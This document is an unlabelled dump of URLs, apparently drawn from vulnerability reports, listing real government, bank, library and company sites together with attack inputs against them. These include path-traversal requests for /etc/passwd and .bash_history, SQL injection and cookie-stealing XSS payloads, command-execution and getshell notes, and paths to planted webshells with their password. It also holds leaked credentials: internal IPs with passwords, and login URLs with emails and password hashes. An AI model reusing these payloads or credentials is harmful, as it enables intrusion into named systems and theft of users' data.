used_memory_lua:33792 mem_fragmentation_ratio:1.28 mem_allocator:jemalloc-3.4.1 rdb_last_save_time:1432737156 total_connections_received:9902 total_commands_processed:8795662 expired_keys:5470 keyspace_hits:612311 keyspace_misses:6500171 latest_fork_usec:594 role:master repl_backlog_size:1048576 used_cpu_sys:896.06 used_cpu_user:1366.81 used_cpu_sys_children:79.05 used_cpu_user_children:480.75 db0:keys=195,expires=172,avg_ttl=1083509001 http://stage.yunshanmeicai.com/ http://103.227.78.174:8080/ http://103.227.78.174:4001/ http://tieba.xx.ztgame.com/index.php?mod=bbs&kw=1*&page=10&act=list http://act.xx.ztgame.com/bbs/index.php?mod=bbs&act=list&kw=1* http://act.xzt.ztgame.com/lwj/index.php?mod=clan&act=zdlist&kw=1* http://chrb.tw/tenement.php?city_id=0&S1=8 http://rs.lenovo.net/index.php http://42.121.118.68:8080/login/Login_out.do http://42.62.39.206/wap/fl2/?mo=1&sortid=12&cm=M3140060&site=0 https://125.76.230.45/user/login https://125.76.230.44/user/login http://www.chinesetest.cn/kaoshenginfoStartbythemselves.do?bmid=11987*** http://pai.baidu.com/htdocs.tgz http://119.90.53.100/ http://119.90.53.180/ http://119.90.53.100/default/checklogin http://www.xjicpa.org.cn/login/login.do存在命令执行漏洞 f1da:9c96%13 http://crm.icbccs.com.cn/login.jsp http://crm.icbccs.com.cn/hsipccweb/random.jsp https://119.90.53.170/explore/projects http://www.kflib.cn:8089/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://211.84.229.10:8089/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://218.241.174.148:8070/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://211.86.195.15:8086/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://61.187.55.41:8090/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://tsjs.sdwm.cn:8000/ggjs/dzxx/dzxxxs.jsp?dztm=1&dzmm=3 http://beta.yunshanmeicai.com/ http://crm.yunshanmeicai.com/ http://ycg.qq.com http://mail.xunyou.com/ http://www.wetcode.com.cn/ http://www.ed12345.com:80/check.php http://www.tttc.com.cn/images/3389.aspx http://61.235.150.158/ http://61.235.150.158/showIndex.action 
http://kanwu.ccaonline.cn/atmm/listSearch.aspx?strTitleKey=123 http://www.i4.cn http://www.i4.cn/about.html#feedback http://www.bygzjy.cn/ http://www.gsggzyjy.cn/ http://www.plsggzyjy.cn/ http://121.40.131.71:8031/ http://www.jcggzy.com/ http://zyggzy.com/ http://ebs.chnzb.cn/ http://www.ctvap.cn/ui/Authenticate/SignIn.aspx http://118.85.207.153/invokering/JMXInvokerServlet部署war进行getshell http://118.85.207.153/is/index.jsp http://www.nsccsz.gov.cn/hpc/services/apply.aspx www.nsccsz.gov.cn http://218.192.12.50/report/ http://www.tagjj.com http://www.tagjj.com/admin/login.asp http://www.tagjj.com/11.rar https://125.76.228.15/ http://forum.wenming.cn/userPost.do?action=listThread&userName=admin http://forum.wenming.cn/userPost.do?action=listThread&userName=123456 http://forum.wenming.cn/userPost.do?action=listThread&userName=110112 http://forum.wenming.cn/userPost.do?action=listThread&userName=hackers提示找不到用户名 http://forum.wenming.cn/userPost.do?action=listThread&userName=root987提示没有这个用户名 https://125.76.235.29/vpn/index.php https://125.76.235.28/vpn/index.php https://125.76.235.22/vpn/index.php https://125.76.235.21/vpn/index.php http://union.gamebean.com/login.php http://www.h3c.com.cn/BizPortal/OnlineSurvey/ShowVedioImg.aspx?id=86354d9860ba40deacccfe0e36290e44 http://wooyun.org/bugs/wooyun-2010-093724 http://218.90.146.246:9090/common/codeMoreWidget.jsp?code=12 http://124.129.26.94:7742/common/codeMoreWidget.jsp?code=12 http://fe.hy-la.com:8088/common/codeMoreWidget.jsp?code=12 http://oa.suncorps.cn/common/codeMoreWidget.jsp?code=12 http://oa.chnjcdc.com:9090/common/codeMoreWidget.jsp?code=12 http://oa.shunhengli.com:9090/common/codeMoreWidget.jsp?code=12 http://ibmuniversity.csdn.net/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical=* http://www.eventalk.cn/ http://wx.csrcbank.com http://www.sanguomobile.com/download.php http://topic3.kugou.com/2014/qmg/ http://topic3.kugou.com/2014/qmg.zip http://www.agrij.com/) 
http://221.180.22.229:8080/finance/szgkb_form_wap.jsp?village_dm=0107034 http://218.87.99.80:8080/finance_jx05/szgkb_form_wap.jsp?village_dm=0101013 http://61.178.243.127:8081/finance_yc/szgkb_form_wap.jsp?village_dm=0107007 http://106.74.112.41:8081/finance_nxyc/szgkb_form_wap.jsp?village_dm=0108005 http://124.164.240.217:8082/finance45/szgkb_form_wap.jsp?village_dm=0105001 http://221.180.22.229:8080/finance/cmgkb_form_wap.jsp?village_dm=0108007 http://218.87.99.80:8080/finance_jx06/cmgkb_form_wap.jsp?village_dm=0101014 http://61.178.243.127:8081/finance_yc/cmgkb_form_wap.jsp?village_dm=0107012 http://106.74.112.41:8081/finance_nxyc/cmgkb_form_wap.jsp?village_dm=0101019 http://124.164.240.217:8082/finance45/cmgkb_form_wap.jsp?village_dm=0106010 http://221.180.22.229:8080/finance/ysgk_form_wap.jsp?village_dm=0107018 http://218.87.99.80:8080/finance_jx05/ysgk_form_wap.jsp?village_dm=0102004 http://61.178.243.127:8081/finance_yc/ysgk_form_wap.jsp?village_dm=0107026 http://116.255.142.23:8181/finance_xjtc/ysgk_form_wap.jsp?village_dm=0105014 http://106.74.112.41:8081/finance_nxyc/ysgk_form_wap.jsp?village_dm=0103005 http://221.180.22.229:8080/finance/resource_change_detail.jsp?village_dm=0101001 http://124.164.240.217:8080/finance03/resource_change_detail.jsp?village_dm=0105012 http://218.59.175.234:8080/finance03/resource_change_detail.jsp?village_dm=0103002 http://61.178.243.127:8081/finance_yc/resource_change_detail.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc/resource_change_detail.jsp?village_dm=0105002 http://ceo.300.cn/index.php/ceo8/score_adds?type=1 http://**.**.**/wsUDT/cdn/cdn.action_ http://www.net.cn/ https://**.**.**/Zone/index.html_ http://**.**.**/index.phpcontroller=CtTrafficf&action=Index_ https://**.**.**/_ http://60.29.110.41/ https://180.201.32.22/ http://222.143.9.1/ https://gugan.bzpt.edu.cn/ http://www.hanhoo.com/publish/system/badmin/ http://183.63.96.156:8084/editor/plugins/ 
http://183.63.96.156:8084/editor/plugins/baidumap/fake.aspx http://wapi.hexun.com/web.zip www.ourgame.com http://121.9.244.212:88/login.php http://221.203.76.30:8080/EPMS/initLoginBsAction.action http://222.76.242.219:8089/ http://222.76.242.219:8089/WebSite/bin里可以看到几个图片目录,显然系统与厦门交警有关 http://weigou.baidu.com/promo/ft315 https://61.155.49.26/ https://61.155.49.27/ https://61.155.49.28/ https://61.155.49.29/ https://61.155.82.2/ https://61.155.101.116/ https://61.155.110.85/ https://61.155.110.242/ https://61.155.210.98/ http://tejia.ku6.com/.git/config http://122.144.134.79/ispirit/go.php?LOGIN_UID= http://www.ccas.com.cn:8008/ispirit/go.php?LOGIN_UID= http://219.139.134.9:70/ispirit/go.php?LOGIN_UID= http://bjzljz.com/ispirit/go.php?LOGIN_UID= http://chc.eup.cn:88/ispirit/go.php?LOGIN_UID= http://183.129.186.82/IDPA/access/public/login/logout.html www.hqxzfw.gov.cn/news_show.asp?id=910 http://kh.gw.com.cn/.svn/entries http://poc.10086.cn/ http://112.33.0.176:4480/station/logoutAction_logout.action http://211.143.88.98:8000/admin/Rs_login.do http://www.whcits.com/xianlu.aspx?id=04001426757&qu=%B6%AB%C4%CF%D1%C7 http://www.whcits.com/showtupian.aspx?csid=152 http://vip.septwolves.com/manage/web/index.php?app_act=club/user/member/address&num=99999 http://wooyun.org/bugs/wooyun-2015-0101199 http://sl.zhuna.cn/login www.ga.xm.gov.cn:3388/was2/xmsga/jsp/module/user/user_login.jsp_ http://hb.qq.com/a/20150528/029991.htm http://huodong.dachuw.com/ http://game.ent.sina.com.cn/ent/game_open_time.php?game_id=1 http://game.ent.sina.com.cn/ent/game_open_time.php?game_id=1%20or%201=1 http://www.snatcm.gov.cn/dzzw_login.htm http://www.kflib.cn:8089/opac/qtjsjg.jsp http://211.84.229.10:8089/opac/qtjsjg.jsp http://218.241.174.148:8070/opac/qtjsjg.jsp http://211.86.195.15:8086/opac/qtjsjg.jsp http://61.187.55.41:8090/opac/qtjsjg.jsp http://tsjs.sdwm.cn:8000/opac/qtjsjg.jsp http://www.kflib.cn:8089/opac/index.jsp?page=index_qtjs.jsp&index=11 http://live.wasu.cn/.git/config 
ssh://git@stash1.wtvdev.com:7999/por/portal.git http://www.infosea.com.cn/yonghu.html http://124.207.106.138:8070/opac/dzxxxgjg.jsp http://218.241.174.148:8070/opac/dzxxxgjg.jsp http://58.133.216.9:8070/opac/dzxxxgjg.jsp http://111.207.101.74:8070/opac/dzxxxgjg.jsp http://58.132.57.4:8070/opac/dzxxxgjg.jsp http://218.75.178.63:8089/opac/dzxxxgjg.jsp http://think.lenovo.com.cn/service/warranty/newsearchWarranty.aspx http://mail.yxj.org.cn/ http://c.lagou.com/childrenday/description.html?utm_source=AD__weixin&utm_medium=cxydnxs&utm_campaign=ertongjie#rd http://dealer.auto.sohu.com/bat69210/index.html http://dealer.auto.sohu.com/ http://dealer.auto.sohu.com/bat69210/index.html http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=569964936@qq.com&password=b47c41a544ede250423c772636c4da15 http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=136291439@qq.com&password=9ab688ee6be17403e4b1ef43e4bf200e http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=1522532155@qq.com&password=16175989d44096c5f41207b10160dfd7 http://xl.5184.com/Degree/master/memberUserLoginAction.do?method=login&userName=liuning19072@qq.com&password=50ebc2f6e13a2705e9b5c43de48f73ec http://123.127.67.55:8080/admin/main.action;jsessionid=AC29C49AAA408F7EC63FF6EB61E5714C存在命令执行漏洞 http://yixin.myctu.cn/Home/SignIn?ReturnUrl=/ http://proxy.resource.myctu.cn/ http://gateway.myctu.cn/ http://www.1633.com/ www.1633.com www.1633.com https://ebank.yaccb.cn/pweb/prelogin.do?_locale=zh_CN&BankId=9903&LoginType=C http://www.tudou.com/uis/sub/sub.action?jsoncallback=test&subId=765758835&type=2&app=watch&deviceID=1&url=&from=15&uid=769734551 http://oa.ynbit.com https://ebank.lzccb.cn/pweb/prelogin.do?_locale=zh_CN&BankId=9902&LoginType=C https://pan.chexiang.com/ http://101.227.68.174 http://101.227.68.142 http://w.wyschina.com/ https://14.18.235.229直接跳转到 http://pay.8684.com/ http://197.mojichina.com/ http://58.83.201.134/ 
http://docs.bilibili.cn/ http://docs.bilibili.cn/api.php?action=opensearch&search= http://61.185.221.126:8888/ray_stdeclare/prelogin!relogin.action存在命令执行漏洞 http://61.185.221.126:8888/ray_stdeclare/3.jsp密码tom http://61.185.221.126:8888/ray_stdeclare/4.jsp密码tom http://219.242.65.10//BookShow.aspx?SectionId=5f14b425-ab12-4871-a1f3-4996342cdce0&Aid=5554 http://www.hyxlib.com/BookShow.aspx?SectionId=979d4710-1fa8-45d5-97c4-00bc34d75b46&Aid=5617 http://www.jjlib.cn/BookShow.aspx?SectionId=71dbb37b-278e-41f4-835c-71373202c76f&Aid=6185 http://www.nhlib.com.cn/BookShow.aspx?SectionId=98b57414-3dd5-41d2-9f40-4ffe363ffc1f&Aid=5570 http://www.tzlib.cn/BookShow.aspx?SectionId=1303431c-a9ca-403f-afbc-7d5748a490a1&Aid=18648 http://www.mstd.gov.cn/MSTD/province/index.action存在命令执行漏洞 http://www.mstd.gov.cn/MSTD/02.jsp http://www.et315.com http://wb.51hejia.com/.svn/entries http://www.lvse.com/.git/config http://www.ynkmlz.cn/ms/index1.html?notice=%3f%3f%3f+label.swcx.notice+%3f%3f%3f&cal_login_username=yxddly&cal_login_password=400123 http://www.ynkmlz.cn//swcxinfodata/addfile/kmgs/yxddly/addfile/150529/01432871452973029.jsp https://report.ztgame.com/login.html https://report.ztgame.com http://www.guiyan.com/admin_site_manage/Login.aspx http://a.mojichina.com/guessbook/book_re.aspx?action=class&classid=39&getTotal=147&id=1&lpage=1&page=2&sid=-2-0-0-0-480&siteid=1000 http://wms.efeihu.com/Login.aspx http://wooyun.org/bugs/wooyun-2015-0116550/trace/4ca5456cb29a089f537c7e6f2743d40b http://fk.dachuw.com/ http://www.hbtyzx.gov.cn/ http://mp.weicifang.com https://www.jimubox.com/oauth/register http://124.127.41.161:8080/ http://124.127.41.161:8080/oox.asp;.jpg http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.glsc.com.cn/glzq/financing/management/newNetvalue.jsp?fundcode=B40055 http://www.miitbeian.gov.cn/publish/query/indexFirst.action 
http://www.infosea.com.cn/yonghu.html http://125.223.252.12:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://210.45.183.219/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://lib.tongde.com:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://218.75.178.63:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://lib.hhhxy.cn:88/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://222.56.16.81:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://59.51.114.198:8088/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://222.247.62.197:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://221.206.143.42:8088/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://tsjs.sdwm.cn:8000/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://weidian.com/user/userinfo/judge.html?umk=438821803&orderid=1186626160竟然可以访问到; http://bx.315.com.cn:8000这个站直接可获取用户的密码Hash,后台可shell,详情请参考 http://www.czrsks.com/newclass.asp?bigid=25 http://share.tataufo.com/ http://ad.189.cn/login.jsp http://115.236.124.4/ IP:10.120.13.200 Port:18822 key:wanghq Password:qwer ip:10.120.83.156/163 port:18822 key:zzx password:qwer password:qwer1234 http://admin.iwo.kazhu365.com/ http://iwocar.kazhu365.com/ http://119.188.6.230:8080/dl/download.do?encoding=GBK&decoding=ISO-8859-1&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://119.188.6.230:8989/dl/download.do?encoding=GBK&decoding=ISO-8859-1&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://119.188.6.230:8888/login.do http://119.188.6.230:8888/error.jsp http://bbs.csdn.net/topics/370258545 http://119.188.6.230:8888/ http://**.**.**/ http://king.youzu.com/image/downloadImg?src=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://king.youzu.com/image/downloadAudio?src=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd https://pbank.psbc.com/pweb/GetUserNickNamePre.do?_locale=zh_CN&BankId=9999 http://wooyun.org/bugs/wooyun-2010-082959 http://chc.eup.cn:88/interface/auth.php?&PASSWORD=1&USER_ID= 
http://122.144.134.79/interface/auth.php?&PASSWORD=1&USER_ID= http://www.ccas.com.cn:8008/interface/auth.php?&PASSWORD=1&USER_ID= http://219.139.134.9:70/interface/auth.php?&PASSWORD=1&USER_ID= http://bjzljz.com/interface/auth.php?&PASSWORD=1&USER_ID= http://114.251.10.35 http://222.73.36.228:80/ http://www.110.com/ask/question-3187559.html http://xingqu.baidu.com/p/3549102984 www.qiulianai.cn www.jrgl.org/qyfccont.php?id=7 jrgl.org/admin就出来了 http://oa.yccas.com/Finance/Invoice_edit.aspx http://**.**.**/Finance/Invoice_edit.aspx 315.com.cn/***tao-7* http://mlhy.wizlong.com/statistics/student?school= http://dbmonitor.yunshanmeicai.com/anemometer/ http://115.182.33.133/houtai/index.php http://beta.yunshanmeicai.com/ http://www.4007123123.com/updatepwd.aspx?mycode=6hjvvukjny7dxvzduqw31puvj&email=邮箱帐号@qq.com http://www.ct96006.cn/96006/manager/login.action存在命令执行 http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60 http://wine.jifentao.com http://www.boqii.com/user/login?referer=http://www.boqii.com/userinfo/# http://www.tianya8.cc/viewnews.php?newsid=152 http://www.jinlianchu.com/issue_getMyIssue.html http://www.ixm.gov.cn http://www.ixm.gov.cn/app/wyyy/201409/t20140902_65176.html http://www.ixm.gov.cn/ids/custom/xiamen/login_xm.jsp?returnUrl=http%3a%2f%2fwww.ixm.gov.cn%2fjisheng%2fSystem%2fCertificate%2fdefault.aspx%3fapplytype%3d1 http://www.ixm.gov.cn/jisheng/System/UpFile/2015Year/5Mouth28Day/67923c8e-36d2-4835-aa77-9f43f10d69b7.asp http://luc.jiangtai.com/Login,进行登陆,里面泄漏1718条客户信息,并有持续泄漏的迹象。 http://www.whcits.com/xieyou.aspx http://ipos.septwolves.com/ http://market.sdo.com/snda_market_0.2/search_apk.php?q=123 http://115.238.28.251:8861/peds/loginAction.do?action=checkuser&source=hc http://jianzhan.b2b.cn http://www.norsencn.com:80/ www.norsencn.com http://www.miit.gov.cn http://mail.miit.gov.cn:8080/index.php site:mail.miit.gov.cn 
http://mail.miit.gov.cn:8080/login.php?F_authid=emh1amlhamlhQG1paXQuZ292LmNuJjIwMTUtMDItMDEmNTRjNzU0MTdjMTQ3ZTM2YWY1ZTYyZWUzZmNjZDZhNWU= http://private.avazu.cn/.svn/entries http://www.jsjyt.gov.cn/ http://www.gzdpc.gov.cn/ http://www.ahaic.gov.cn/ http://lm.nantong.gov.cn http://www.zjtt.gov.cn inurl:/markbook/GetIndex.jsp http://61.139.105.145/markbook/ http://61.139.105.145/markbook/FAQDisplay.jsp?FID=39 jsp:useBean http://jwc.scnu.edu.cn/qq.asp http://jwc.scnu.edu.cn/burp.aspx http://ddcg.jszfcg.gov.cn/projectLogin.action http://pawn.ecitic.com/indexSearchTwoAction?keyWord=&category=new http://www.myfawu.com/product.php?type= http://www.myfawu.com/other/focus.php?focusID= http://www.myfawu.com/other/focus.php?page=1&focusID= http://www.myfawu.com/news/cat.php?cat1= http://www.myfawu.com/news/cat.php?cat1=&cat2= http://www.myfawu.com/news/cat.php?cat1=&cat2=&cat3= http://www.myfawu.com/news/industry_list.php?industryID= http://www.sdchina.com/special/2012/lianghui/Detail.aspx?ID=2235955 http://tour.sdchina.com/special/2011/hsmtx/list.aspx?stid=2454 http://tour.sdchina.com/sight/city.aspx?cityCode=370100&pageid=3 http://tg.sdchina.com/ajax/AjaxUserSearch.aspx?u=123&callback=jsonp1432881358134&_=1432881366419 www.sdchina.com www.hb.xinhuanet.com www.hn.xinhuanet.com www.gmw.cn http://www.chinadaily.com.cn http://news.china.com.cn/ http://**.**.**/index.do http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_userwh.aspx http://202.120.143.35/emlib4/format/release/aspx/eml_userwh.aspx http://166.111.120.118/emlib4/format/release/aspx/eml_userwh.aspx http://202.116.197.15/emlib4/format/release/aspx/eml_userwh.aspx http://58.192.97.29/emlib4/format/release/aspx/eml_userwh.aspx http://211.84.163.227/emlib4/format/release/aspx/eml_userwh.aspx 
http://t2361.sandai.net:8089/oc/@@loginForm.html?camefrom=%2Foc%2F%40%40login%3Fcamefrom%3Dhttp%253A%252F%252Ft2361.sandai.net%253A8089%252Fdefault%252F%2540%2540index.html%26service%3Dhttp%253A%252F%252Ft2361.sandai.net%253A8089%252Fdefault%252F%2540%2540sso http://www.gzdpc.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.ahaic.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://lm.nantong.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.jsjyt.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.zjtt.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://land.huizhou.gov.cn/WorkOnLine/loginAction.action http://118114.myzone.cn/ http://hndxrl.myzone.cn/oa/?action=mypassword&type= http://pydx.xt0393.com/OA/?action=mypassword&type= http://ycsfj.myzone.cn/OA/?action=mypassword&type= http://lhrsbx.myzone.cn/OA/?action=mypassword&type= https://passport.haodf.com/user/showlogin http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com/auth/user/registerUserAction.action http://www.cqfzb.gov.cn http://www.cqfzb.gov.cn/Pro_General/General.aspx?ProID=51 http://www.cqfzb.gov.cn/fzbzgzj/login.aspx http://www.cqfzb.gov.cn/fzbbb/login.aspx http://61.151.239.168/store/show.php?id=110 http://61.151.239.168/store/cjwtlist.php?id=14 https://its.bocmacau.com/prelogin.do?_locale=zh_CN&BankId=9999&LoginType=R http://www.shcdkf.com/kfweb/Article_Class01.aspx?mid1=0002 http://cwch.ahu.edu.cn/querynetweb/Article_Class01.aspx?mid1=0002 http://cycwc.gzife.edu.cn/kefa/Article_Class01.aspx?mid1=0001 http://cw.syu.edu.cn:8080/KfWeb/Article_Class01.aspx?mid1=0001 http://58.16.80.232/kefa/Article_Class01.aspx?mid1=0001 http://221.5.51.228/cjb/Article_Class01.aspx?mid1=0001 http://bbs.jia.com/t_2127337 http://i.jia.com/user/show_info.htm http://i.jia.com/user/mod_addr.htm?id=197910 http://wx.ppmoney.net/weixinmanager/index.jsp 
http://www.rjggy.com http://shzyq.com/ http://syytrqhg.firstknow.cn http://www.cnpc-ngo.com http://www.formarket.net http://yuyue.mama.cn/index.php?a=Index&cidname=*&cityname=%E5%B9%BF%E5%B7%9E&d=get_shopslist&g=Home http://mail.qyhhua.com/wapmail/index.action http://shop.ecaic.com http://shop.ecaic.com/netSales/pagesCar/SimpleCarEdit.do http://shop.ecaic.com/netSales/pagesCar/SimpleCarEdit.do jar:/opt/jdk1.5.0_22/lib/tools.jar http://i.boqii.com http://www.gobetter.cn/ http://www.webgobetter.com http://122.200.76.196 http://115.28.233.30:7921 http://webgobetter.com http://211.103.201.211 http://www.jzedu.com/jxgz_view.asp?id=443 http://www.jzedu.com/admin http://cz.emyda.com/head/ http://cz.emyda.com/head/admin.php?s=/Public/login/ https://vpn.lppz.com/ http://219.142.76.180/www/jsp/index.jsp http://oa.zotye.com/main/login.jsp http://www.whcits.com http://www.whcits.com//xianlu.aspx?id=04001377155&qu=-1* https://wlan.ct10000.com http://changba.kuwo.cn/kge/config.jsp http://60.28.201.187/l.web http://topmusic.kuwo.cn/today_recommend/xml_new.htm http://topmusic.kuwo.cn/today_recommend/ring_xml.html http://changba.kuwo.cn/kge/admin/ http://60.28.205.41:8280/admin/login.jsp http://60.28.205.41:8280/KuwoEdit/index.jsp http://mcache.oss.letv.com/queue/dump?type=1 TaskCount:4094/4319 FieldName:REPLY Host:115.182.93.91 http://mcache.oss.letv.com/queue/dump?type=1 http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com http://115.182.212.201/.git http://113.106.83.122/ http://113.106.83.122/SISP/Default.aspx https://www.baidu.com/?fenlei=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://gsxt.saic.gov.cn/ http://url/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd http://xy.linkong.com/activity/date/rank.php?datestr=20100519&pn=-1 http://www.shouliwang.com/travel/travel.rar http://www.shouliwang.com/travel/shoumanage/Index.aspx www.shouliwang.com/travel/templets/1php/2015-5/1.aspx http://sh.suning.com 
http://sh.suning.com/life/ajax/memtrans-ajax!checkMemberInfo.action?collectAccount=1865166xxxx http://v.youku.com/v_show/id_XNjk2MTM4OTI4.html http://www.dji.com/cn/fly-safe/category-mc http://card.sicnu.edu.cn/_wx/_wx_home_news.aspx?fid=&kw= http://card.sicnu.edu.cn/_wx/_wx_home_news_ajax.ashx?action=GetHtml&fid=&kw=1 http://iportal.jpush.cn http://iportal.jpush.cn/login/ http://iportal.jpush.cn/devinfo/?devid=69726@ http://www.linekong.com/xml/common.php?num=5&sort_id=97 http://www.bayueshan.com/erp/ http://www.bayueshan.com/index!erp.action ftp://218.78.217.83/ www.shouliwang.com/travel/travel.rar URL:http://tk.100xuexi.com/Member/MyShelf/buy.aspx URL:http://tk.100xuexi.com/Member/MyShelf/download.aspx URL:http://tk.100xuexi.com/Member/MyShelf/favor.aspx http://115.29.204.64:9001/ http://dev.itojoy.com:8080 http://app.cqrcb.com:81/apply/bak.jsp http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1 http://xy.linkong.com/picture.php?page=2&sort_id=* http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=* http://xy.linkong.com/xml/common.php?num=5&sort_id=* http://xy.linkong.com/wallpaper.php?page=2&sort_id=* http://183.62.155.101/BAFC/LEAP/Login/440306/BAFC/Login.html http://wenku.baidu.com/view/938dddccfe4733687f21aa10.html http://www.12321.cn/12321/notice_detail.php?id=33 http://218.20.201.91/pyjf/rygl/register.action存在命令执行漏洞 http://218.20.201.91/pyjf/2.jsp密码tom www.95572.com http://www.95572.com/jsp/grzx/grzx.jsp?ColumnID=57 http://www.jsycjw.gov.cn/oldjjw/admin/update.asp?action=update http://www.jsycjw.gov.cn/oldjjw/admin/update.asp?action=update http://app.ssia.org.cn/login.jsp http://www.sczfcg.com/CmsNewsController.do?bulletinType=06&channelCode=cgygg&index=recommendBulletinList&isAJAX=true&method=recommendBulletinList&page=1&rp=9 http://www.sczfcg.com/SupplierShowController.do?districtId=1&districtLevel=1&isAJAX=true&keyWord=e&method=getSupplierForList&page=1&rp=20 
http://www.sczfcg.com/UniqueController.do?method=isUnique http://u.muzhiwan.com/.svn/entries www.ankang06.org(安康家园)隶属北京金宝威教育科技有限公司(www.kidspower.cn) http://www.ankang06.org/.svn/entries http://www.china-seeq.com/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/conf/server.xml http://localhost:8080/see-core/ws/adminUser?wsdl soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body ns2:queryComPany xmlns:ns2="http://ws.admin.core.see.com/ ns2:adminUserRzComPanyRequest ns2:adminUserRzComPanyRequest ns2:queryComPany soap:Body soap:Envelope http://market.oppo.com:8888/login.do http://wk.100xuexi.com http://link.1905.com/.svn/entries http://2015.jsjds.org/index.php/site/viewText?id=1 http://www.jsjds.org/UserList.asp?OrderType=1&page=1 http://wkjsj.cn/User_GetPassword.asp http://summerintern.chinaamc.com www.dxsch.tsinghua.edu.cn http://219.242.65.10/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://drtsg.qzjmc.edu.cn:8084/Booklist.aspx?SectionId=0f68c0b2-e4da-43f6-a062-094348a9622c http://www.jjlib.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://www.nhlib.com.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://www.tzlib.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://try.ellechina.com/upload/sf/sitemap.html http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/&fileName=lipei.rar http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../../../etc/&fileName=passwd http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../&fileName=cardactive.jsr http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../../../root/&fileName=.bash_history 
http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../&fileName=.bash_history http://61.142.174.200/cwc/KFweb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://cycwc.gzife.edu.cn/kefa/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://cw.syu.edu.cn:8080/KfWeb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://58.16.80.232/kefa/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://221.5.51.228/cjb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://www.shcdkf.com/kfweb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://www.shouliwang.com/login.html http://www.citshn.net.cn/info.asp?id=3518 http://citshn.net.cn/about.asp?id=6 http://mall.oppo.com/index.php?q=account/addr&aid=3031 http://mall.oppo.com/index.php?q=account/addr&aid=3030 http://cichang.hujiang.com/services/mobileservice2.asmx http://www.msxt.com/caifu/chanpin/show.php?id=449 http://www.601601.com/ http://hx.553.com/index.php?p=1&r=index/audio&t=1 display:none http://oldweb.cqvip.com/Trace.axd http://ir.cqvip.com/Trace.axd http://zlf.cqvip.com/Trace.axd http://suse.ss.cqvip.com/Trace.axd http://cqvip.com/Trace.axd http://test.cqvip.com/Trace.axd http://mju.ss.cqvip.com/Trace.axd http://cstj.cqvip.com/Trace.axd http://ahu.ss.cqvip.com/Trace.axd http://hzu.ss.cqvip.com/Trace.axd 